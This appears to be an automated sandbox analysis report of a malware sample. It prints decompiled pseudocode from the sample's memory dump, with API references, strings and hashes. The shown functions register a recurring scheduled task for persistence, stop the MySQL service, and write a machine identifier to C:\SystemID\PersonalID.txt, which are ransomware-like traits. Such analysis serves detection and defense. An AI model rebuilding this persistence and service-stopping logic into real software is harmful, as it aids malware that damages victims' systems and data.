0x00418135
0x0041813e
0x00418137
0x00418139
0x00418139
0x00418141
0x00418144
0x0041814a
0x00418146
0x00418146
0x00418146
0x0041814c
0x0041814f
0x00418151
0x00418157
0x0041815f
0x00418163
0x00418304
0x00418304
0x00418305
0x00000000
0x00418305
0x00418151
0x0041807e
0x00418082
0x0041808e
0x00418084
0x00418086
0x00418089
0x00418089
0x00418095
0x004180a1
0x00418097
0x00418099
0x0041809c
0x0041809c
0x004180a6
0x004180b9
0x004180be
0x004180c1
0x004180c1
0x004180c8
0x004180ca
0x004180ca
0x004180d0
0x004180d6
0x004180d2
0x004180d2
0x004180d2
0x004180da
0x004180e9
0x0041830a
0x0041830a
0x004180da
0x00418311
0x00418314
0x00418318
0x0041832a
0x0041832e
0x00418335
0x0041831a
0x0041831d
0x00418327
0x00418327
0x00418318
0x0041804f
0x00418022

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

invalid string position, xrefs: 00418342
string too long, xrefs: 00418338

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160
comstringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040DAC0(char _a4, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				intOrPtr _v60;
				intOrPtr _v76;
				short _v84;
				intOrPtr _v88;
				char _v92;
				short _v20572;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t87;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr _t129;

				 *[fs:0x0] = _t129;
				_t61 = E0042F7C0(0x504c);
				_v8 = 0;
				__imp__CoInitialize(0,  *[fs:0x0], 0x4ca948, 0xffffffff);
				if(_t61 >= 0) {
					__imp__CoCreateInstance(0x4d4f6c, 0, 1, 0x4d4f3c,  &_v24);
					_t63 = _v24;
					_push( &_v20);
					_push(0x4d4f8c);
					_push(0x4d4f9c);
					_push(L"Time Trigger Task");
					_push(_t63);
					if( *((intOrPtr*)( *_t63 + 0x20))() != 0) {
						_t98 = _v24;
						 *((intOrPtr*)( *_t98 + 0x1c))(_t98, L"Time Trigger Task");
						_t100 = _v24;
						 *((intOrPtr*)( *_t100 + 0x20))(_t100, L"Time Trigger Task", 0x4d4f9c, 0x4d4f8c,  &_v20);
					}
					_t65 = _v20;
					 *((intOrPtr*)( *_t65))(_t65, 0x4cf2e8,  &_v36);
					_t67 = _v36;
					 *((intOrPtr*)( *_t67 + 0x18))(_t67, 0, 1);
					_t69 = _v20;
					 *((intOrPtr*)( *_t69))(_t69, 0x4d4f7c,  &_v44);
					_t71 = _v20;
					 *((intOrPtr*)( *_t71 + 0x78))(_t71, 0x500078, 0);
					_t73 = _v20;
					_t122 =  >=  ? _a4 :  &_a4;
					 *((intOrPtr*)( *_t73 + 0x80))(_t73,  >=  ? _a4 :  &_a4);
					_t75 = _v20;
					 *((intOrPtr*)( *_t75 + 0x88))(_t75, L"--Task");
					_t78 =  >=  ? _a4 :  &_a4;
					lstrcpyW( &_v20572,  >=  ? _a4 :  &_a4);
					PathRemoveFileSpecW( &_v20572);
					_t83 = _v20;
					 *((intOrPtr*)( *_t83 + 0x90))(_t83,  &_v20572);
					_t85 = _v20;
					 *((intOrPtr*)( *_t85 + 0x48))(_t85, L"Comment");
					_t87 = _v20;
					_v28 = 0;
					_v32 = 0;
					_v40 = 0;
					 *((intOrPtr*)( *_t87 + 0xc))(_t87,  &_v40,  &_v28);
					E0042B420( &_v92, 0, 0x30);
					_v88 = 0xb07e2;
					_v92 = 0x30;
					_t129 = _t129 + 0xc;
					_v84 = 1;
					_t93 = _v28;
					_v76 = 0x21000c;
					_v60 = 0;
					 *((intOrPtr*)( *_t93 + 0xc))(_t93,  &_v92);
					_t95 = _v20;
					 *((intOrPtr*)( *_t95))(_t95, 0x4cf2e8,  &_v32);
					_t97 = _v32;
					_t61 =  *((intOrPtr*)( *_t97 + 0x18))(_t97, 0, 0);
					__imp__CoUninitialize();
				}
				if(_a24 >= 8) {
					_t61 = L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t61;
			}

0x0040dad6
0x0040dadd
0x0040dae4
0x0040daeb
0x0040daf3
0x0040db0b
0x0040db11
0x0040db17
0x0040db18
0x0040db1d
0x0040db24
0x0040db29
0x0040db2f
0x0040db31
0x0040db3c
0x0040db3f
0x0040db58
0x0040db58
0x0040db5b
0x0040db6a
0x0040db6c
0x0040db76
0x0040db79
0x0040db88
0x0040db8a
0x0040db97
0x0040db9a
0x0040dba4
0x0040dbac
0x0040dbb2
0x0040dbbd
0x0040dbca
0x0040dbd6
0x0040dbe3
0x0040dbe9
0x0040dbf6
0x0040dbfc
0x0040dc07
0x0040dc0a
0x0040dc11
0x0040dc1b
0x0040dc22
0x0040dc2d
0x0040dc38
0x0040dc42
0x0040dc49
0x0040dc4d
0x0040dc55
0x0040dc5c
0x0040dc5f
0x0040dc66
0x0040dc71
0x0040dc74
0x0040dc83
0x0040dc85
0x0040dc8f
0x0040dc92
0x0040dc92
0x0040dc9c
0x0040dca1
0x0040dca6
0x0040dcac
0x0040dcb6

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32 ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

Comment, xrefs: 0040DBFF
--Task, xrefs: 0040DBB5
Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411A10() {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t9;
				int _t10;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t23;
				void* _t26;

				_t9 = OpenSCManagerW(0, 0, 1);
				_t19 = _t9;
				if(_t19 != 0) {
					_t10 = OpenServiceW(_t19, L"MYSQL", 0x20);
					_t26 = _t10;
					if(_t26 == 0) {
						L12:
						return _t10;
					}
					if(ControlService(_t26, 1,  &_v32) == 0) {
						L11:
						_t10 = CloseServiceHandle(_t19);
						goto L12;
					}
					if(QueryServiceStatus(_t26,  &_v32) == 0 || _v28 == 1) {
						L10:
						CloseServiceHandle(_t26);
						goto L11;
					} else {
						_t16 = _v12;
						do {
							_t23 = _t16;
							Sleep(_v8);
							if(QueryServiceStatus(_t26,  &_v32) == 0) {
								break;
							}
							_t16 = _v12;
						} while (_t16 >= _t23 && _v28 != 1);
						goto L10;
					}
				}
				return _t9;
			}

0x00411a1d
0x00411a23
0x00411a27
0x00411a32
0x00411a38
0x00411a3c
0x00411aa4
0x00000000
0x00411aa4
0x00411a54
0x00411aa0
0x00411aa1
0x00000000
0x00411aa3
0x00411a63
0x00411a9d
0x00411a9e
0x00000000
0x00411a6b
0x00411a6b
0x00411a70
0x00411a73
0x00411a75
0x00411a88
0x00000000
0x00000000
0x00411a8a
0x00411a8d
0x00000000
0x00411a97
0x00411a63
0x00411aa9

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0044F26C(void* __eflags, char _a4) {
				char _v16;
				char _v24;
				char _v44;
				intOrPtr _v52;
				char _v76;
				char _v84;
				char _v104;
				void* _t50;
				void* _t51;

				_t51 = _t50 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6560;
				E00430ECA( &_v16, 0x508238);
				asm("int3");
				_push(_t50);
				E00430CFC( &_v44,  &_v24);
				_v44 = 0x4d6578;
				E00430ECA( &_v44, 0x508274);
				asm("int3");
				_push(_t51);
				E0044EF74( &_v76, _v52);
				E00430ECA( &_v76, 0x508320);
				asm("int3");
				_push(_t51 - 0xc);
				E00430CFC( &_v104,  &_v84);
				_v104 = 0x4d656c;
				E00430ECA( &_v104, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00465480(char* _a4, char* _a8) {
				signed int _v8;
				short _v24;
				int _v28;
				int _v32;
				short* _v36;
				void* _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				char _t27;
				int _t28;
				signed int _t29;
				short* _t32;
				signed int _t41;
				int _t58;
				char* _t59;
				char* _t60;
				char* _t64;
				char* _t68;
				char* _t69;
				signed int _t71;
				short* _t72;
				void* _t85;

				E0042F7C0(0x20);
				_t25 =  *0x50ad20; // 0x4ea20c1c
				_v8 = _t25 ^ _t71;
				_t59 = _a8;
				_t69 = _a4;
				_t60 = _t69;
				_t68 =  &(_t60[1]);
				do {
					_t27 =  *_t60;
					_t60 =  &(_t60[1]);
				} while (_t27 != 0);
				_v28 = 8;
				_t28 = _t60 - _t68 + 1;
				_v32 = _t28;
				_t29 = MultiByteToWideChar(0xfde9, 8, _t69, _t28, 0, 0);
				_t70 = _t29;
				if(_t29 > 0) {
					L6:
					E0043F980(_t70 + _t70);
					_t32 = _t72;
					_t70 = MultiByteToWideChar;
					_v36 = _t32;
					__eflags = MultiByteToWideChar(0xfde9, _v28, _t69, _v32, _t32, MultiByteToWideChar);
					if(__eflags == 0) {
						goto L18;
					} else {
						_t64 = _t59;
						_t68 =  &(_t64[1]);
						do {
							_t41 =  *_t64;
							_t64 =  &(_t64[1]);
							__eflags = _t41;
						} while (_t41 != 0);
						__eflags = MultiByteToWideChar(0xfde9, 0, _t59, _t64 - _t68 + 1,  &_v24, 8);
						if(__eflags == 0) {
							goto L18;
						} else {
							_t70 = E00420FDD(_v36,  &_v24);
							_t72 =  &(_t72[4]);
							__eflags = _t70;
							if(__eflags != 0) {
								goto L15;
							} else {
								__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 2;
								if(__eflags == 0) {
									goto L14;
								} else {
									__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 9;
									goto L13;
								}
							}
						}
					}
				} else {
					if(GetLastError() != 0x3ec) {
						L5:
						_t85 = GetLastError() - 0x459;
						L13:
						if(_t85 != 0) {
							L18:
							E004512D0(_t59, _t68, _t69, _t71, __eflags, 2, 1, GetLastError(), ".\\crypto\\bio\\bss_file.c", 0xa9);
							_push("\')");
							_push(_t59);
							_push("\',\'");
							_push(_t69);
							E004504A0(5, "fopen(\'");
							__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 2;
							if(__eflags != 0) {
								_push(0xae);
								_push(".\\crypto\\bio\\bss_file.c");
								_push(2);
							} else {
								_push(0xac);
								_push(".\\crypto\\bio\\bss_file.c");
								_push(0x80);
							}
							_push(0x6d);
							_push(0x20);
							E004512D0(_t59, _t68, _t69, _t71, __eflags);
							goto L22;
						} else {
							L14:
							_t70 = E004220B6(_t69, _t59);
							_t72 =  &(_t72[4]);
							if(_t70 == 0) {
								goto L18;
							} else {
								L15:
								_t69 = E0044F960(_t59, _t68, 0x50f2e0);
								_t87 = _t69;
								if(_t69 != 0) {
									E0044F3B0(_t69, 0);
									E0044F3E0(_t69, _t71, _t69, 0x6a, 1, _t70);
									__eflags = _v8 ^ _t71;
									return E0042A77E(_t59, _v8 ^ _t71, _t68, _t69, _t70);
								} else {
									_push(_t70);
									E00423A38(_t59, _t69, _t70, _t87);
									L22:
									return E0042A77E(_t59, _v8 ^ _t71, _t68, _t69, _t70);
								}
							}
						}
					} else {
						_v28 = 0;
						_t58 = MultiByteToWideChar(0xfde9, 0, _t69, _v32, 0, 0);
						_t70 = _t58;
						if(_t58 > 0) {
							goto L6;
						} else {
							goto L5;
						}
					}
				}
			}

0x00465488
0x0046548d
0x00465494
0x00465498
0x0046549d
0x004654a0
0x004654a2
0x004654a5
0x004654a5
0x004654a7
0x004654a8
0x004654b0
0x004654b9
0x004654c5
0x004654c8
0x004654ce
0x004654d2
0x00465510
0x00465513
0x00465518
0x0046551b
0x00465525
0x00465533
0x00465535
0x00000000
0x0046553b
0x0046553b
0x0046553d
0x00465540
0x00465540
0x00465542
0x00465543
0x00465543
0x0046555d
0x0046555f
0x00000000
0x00465565
0x00465571
0x00465573
0x00465576
0x00465578
0x00000000
0x0046557a
0x0046557f
0x00465582
0x00000000
0x00465584
0x00465589
0x00000000
0x00465589
0x00465582
0x00465578
0x0046555f
0x004654d4
0x004654df
0x00465503
0x00465509
0x0046558c
0x0046558c
0x004655eb
0x00465600
0x00465605
0x0046560a
0x0046560b
0x00465610
0x00465618
0x00465625
0x00465628
0x0046563b
0x00465640
0x00465645
0x0046562a
0x0046562a
0x0046562f
0x00465634
0x00465634
0x00465647
0x00465649
0x0046564b
0x00000000
0x0046558e
0x0046558e
0x00465595
0x00465597
0x0046559c
0x00000000
0x0046559e
0x0046559e
0x004655a8
0x004655ad
0x004655af
0x004655c2
0x004655cd
0x004655e0
0x004655ea
0x004655b1
0x004655b1
0x004655b2
0x00465653
0x00465668
0x00465668
0x004655af
0x0046559c
0x004654e1
0x004654e8
0x004654f7
0x004654fd
0x00465501
0x00000000
0x00000000
0x00000000
0x00000000
0x00465501
0x004654df

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
GetLastError.KERNEL32(?,?,00000000), ref: 00465503
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5

Strings

',', xrefs: 0046560B
.\crypto\bio\bss_file.c, xrefs: 004655F0, 0046562F, 00465640
fopen(', xrefs: 00465611

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: ','$.\crypto\bio\bss_file.c$fopen('
API String ID: 1717984340-2085858615
Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040C740(char _a4, intOrPtr _a20, intOrPtr _a24) {
				struct _SECURITY_ATTRIBUTES* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				struct _SECURITY_ATTRIBUTES* _v56;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t86;
				void* _t92;
				void* _t95;
				void* _t96;
				signed int _t98;
				struct _SECURITY_ATTRIBUTES** _t101;
				DWORD* _t109;
				void* _t117;
				signed int _t121;
				intOrPtr _t123;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t128;
				signed int _t138;
				intOrPtr _t141;
				signed int _t142;
				signed int _t143;
				intOrPtr _t144;
				signed int _t146;
				signed int _t147;
				signed int _t150;
				intOrPtr _t151;
				void* _t153;
				void* _t155;
				void* _t156;

				_push(0xffffffff);
				_push(0x4ca7b8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t151;
				_v8 = 0;
				_t121 = 0;
				_t138 = 0;
				_v32 = 0;
				_t141 = 0;
				_v28 = 0;
				_v24 = 0;
				_v8 = 1;
				_t77 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "r");
				_t153 = _t151 - 0x130 + 8;
				_v20 = _t77;
				if(_t77 == 0) {
					L28:
					_t142 = _t121;
					if(_t121 == _t138) {
						L32:
						CreateDirectoryW(L"C:\\SystemID", 0);
						_t79 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "w");
						_t153 = _t153 + 8;
						_v20 = _t79;
						if(_t79 != 0) {
							_t143 = _t121;
							__eflags = _t121 - _t138;
							if(_t121 == _t138) {
								L47:
								__eflags = _a24 - 8;
								_t144 = _v20;
								_t81 =  >=  ? _a4 :  &_a4;
								_push(_t144);
								_push( >=  ? _a4 :  &_a4);
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_push("\n");
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_t79 = E00423A38(_t121, _t138, _t144, __eflags);
								_t153 = _t153 + 0x14;
								__eflags = _t121;
								if(_t121 == 0) {
									L54:
									if(_a24 >= 8) {
										_t79 = L00422587(_a4);
									}
									 *[fs:0x0] = _v16;
									return _t79;
								}
								_t146 = _t121;
								__eflags = _t121 - _t138;
								if(_t121 == _t138) {
									L53:
									_t79 = L00422587(_t121);
									_t153 = _t153 + 4;
									goto L54;
								}
								do {
									__eflags =  *((intOrPtr*)(_t146 + 0x14)) - 8;
									if( *((intOrPtr*)(_t146 + 0x14)) >= 8) {
										L00422587( *_t146);
										_t153 = _t153 + 4;
									}
									 *((intOrPtr*)(_t146 + 0x14)) = 7;
									 *(_t146 + 0x10) = 0;
									 *_t146 = 0;
									_t146 = _t146 + 0x18;
									__eflags = _t146 - _t138;
								} while (_t146 != _t138);
								goto L53;
							}
							_t123 = _v20;
							do {
								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 8;
								if(__eflags < 0) {
									_t86 = _t143;
								} else {
									_t86 =  *_t143;
								}
								_push(_t123);
								_push(_t86);
								E004228FD(_t123, _t135, _t138, _t143, __eflags);
								_t143 = _t143 + 0x18;
								_t153 = _t153 + 8;
								__eflags = _t143 - _t138;
							} while (_t143 != _t138);
							_t121 = _v32;
							goto L47;
						}
						L33:
						if(_t121 == 0) {
							goto L54;
						}
						_t147 = _t121;
						if(_t121 == _t138) {
							goto L53;
						}
						do {
							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
								L00422587( *_t147);
								_t153 = _t153 + 4;
							}
							 *((intOrPtr*)(_t147 + 0x14)) = 7;
							 *(_t147 + 0x10) = 0;
							 *_t147 = 0;
							_t147 = _t147 + 0x18;
						} while (_t147 != _t138);
						goto L53;
					}
					while(1) {
						_t91 =  >=  ? _a4 :  &_a4;
						_t79 = E00414C60(_t142,  >=  ? _a4 :  &_a4, 0, _a20);
						if(_t79 != 0xffffffff) {
							goto L33;
						}
						_t142 = _t142 + 0x18;
						if(_t142 != _t138) {
							continue;
						}
						goto L32;
					}
					goto L33;
				}
				_t92 = E00420546(_t77);
				_t155 = _t153 + 4;
				_t158 = _t92;
				if(_t92 != 0) {
					L27:
					_push(_v20);
					E00423A38(_t121, _t138, _t141, _t166);
					_t153 = _t155 + 4;
					goto L28;
				} else {
					do {
						_push(_v20);
						_push(0x7e);
						_push( &_v316);
						_t95 = E00421101(_t121, _t138, _t141, _t158);
						_t156 = _t155 + 0xc;
						if(_t95 == 0) {
							goto L26;
						}
						_v36 = 7;
						_v40 = 0;
						_v56 = 0;
						if(_v316 != 0) {
							_t126 =  &_v316;
							_t135 = _t126 + 2;
							do {
								_t98 =  *_t126;
								_t126 = _t126 + 2;
								__eflags = _t98;
							} while (_t98 != 0);
							_t127 = _t126 - _t135;
							__eflags = _t127;
							_t128 = _t127 >> 1;
							goto L9;
						} else {
							_t128 = 0;
							L9:
							_push(_t128);
							_t129 =  &_v56;
							E00415C10(_t121,  &_v56, _t138, _t141,  &_v316);
							_t101 =  &_v56;
							_v8 = 2;
							if(_t101 >= _t138 || _t121 > _t101) {
								__eflags = _t138 - _t141;
								if(_t138 == _t141) {
									E00414F70(_t121,  &_v32, _t138, _t129);
									_t138 = _v28;
									_t121 = _v32;
								}
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)(_t138 + 0x14)) = 7;
									 *(_t138 + 0x10) = 0;
									 *_t138 = 0;
									__eflags = _v36 - 8;
									if(_v36 >= 8) {
										 *_t138 = _v56;
										_v56 = 0;
									} else {
										_t109 =  &(_v40->nLength);
										__eflags = _t109;
										if(_t109 != 0) {
											E004205A0(_t138,  &_v56, _t109 + _t109);
											_t156 = _t156 + 0xc;
										}
									}
									 *(_t138 + 0x10) = _v40;
									 *((intOrPtr*)(_t138 + 0x14)) = _v36;
									__eflags = 0;
									_v36 = 7;
									_v40 = 0;
									_v56 = 0;
								}
							} else {
								_t132 = _t101 - _t121;
								_t135 = 0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2;
								_t150 = (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2);
								if(_t138 == _v24) {
									E00414F70(_t121,  &_v32, _t138, _t132);
									_t138 = _v28;
									_t121 = _v32;
								}
								_t117 = _t121 + (_t150 + _t150 * 2) * 8;
								if(_t138 != 0) {
									E00413160(_t138, _t117);
								}
							}
							_t138 = _t138 + 0x18;
							_v8 = 1;
							_v28 = _t138;
							if(_v36 >= 8) {
								L00422587(_v56);
								_t156 = _t156 + 4;
							}
							_t141 = _v24;
						}
						L26:
						_t96 = E00420546(_v20);
						_t155 = _t156 + 4;
						_t166 = _t96;
					} while (_t96 == 0);
					goto L27;
				}
			}

0x0040c743
0x0040c745
0x0040c750
0x0040c751
0x0040c761
0x0040c768
0x0040c76a
0x0040c76c
0x0040c76f
0x0040c771
0x0040c774
0x0040c781
0x0040c785
0x0040c78a
0x0040c78d
0x0040c792
0x0040c911
0x0040c911
0x0040c915
0x0040c944
0x0040c94b
0x0040c95b
0x0040c960
0x0040c963
0x0040c968
0x0040c9af
0x0040c9b1
0x0040c9b3
0x0040c9d8
0x0040c9d8
0x0040c9df
0x0040c9e2
0x0040c9e6
0x0040c9e7
0x0040c9e8
0x0040c9ed
0x0040c9ee
0x0040c9f3
0x0040c9f8
0x0040c9f9
0x0040c9fe
0x0040ca01
0x0040ca03
0x0040ca43
0x0040ca47
0x0040ca4c
0x0040ca51
0x0040ca59
0x0040ca64
0x0040ca64
0x0040ca05
0x0040ca07
0x0040ca09
0x0040ca3a
0x0040ca3b
0x0040ca40
0x00000000
0x0040ca40
0x0040ca10
